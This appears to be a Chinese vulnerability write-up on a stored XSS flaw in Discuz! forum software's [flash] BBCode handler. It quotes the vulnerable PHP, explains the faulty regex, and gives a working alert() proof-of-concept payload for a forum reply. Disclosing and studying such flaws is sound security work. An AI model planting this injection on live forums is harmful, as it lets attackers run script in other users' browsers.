Discuz! 帖子正文存在存储型xss漏洞

0x01漏洞范围
 
discuz 7.x 成功
discuz!X 3.1 成功
discuz!X 3.2 失败
具体的范围需要实际测试

 
0x02漏洞详情
 需要开启多媒体代码功能(这个目前很多大站开启了)
source\function\function_discuzcode.php
if(strpos($msglower, '[/flash]') !== FALSE) {
$message = preg_replace("/\[flash(=(\d+),(\d+))?\]\s*([^\[\<\r\n]+?)\s*\[\/flash\]/ies”, $allowmediacode ? "parseflash('\\2', '\\3', '\\4');" : "bbcodeurl('\\4', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);}
跟踪parseflash函数:
function parseflash($w, $h, $url) {
$w = !$w ? 550 : $w;
$h = !$h ? 400 : $h;
preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
$url = $matches[0];
$randomid = 'swf_'.random(3);
if(fileext($url) != 'flv') {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', encodeURI(\''.$url.'\'), \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
} else {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.STATICURL.'image/common/flvplayer.swf\', \'flashvars\', \'file='.rawurlencode($url).'\', \'quality\', \'high\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
}
}
可以看出
preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
正则处理不当
(\?.+)

从而可以带进“'”到 encodeURI(\''.$url.'\'),从而造成存储型xss
到 encodeURI(\''.$url.'\'),从而造成存储型xss。
 
0x03 漏洞证明:
 找一篇帖子回复:
[flash]http://localhost/flash.swf?'+alert('zksmile')+'[/flash]
7.x 截图如下:

1.png

 
x 3.1截图如下:

2.png

 

0 个评论

要回复文章请先登录注册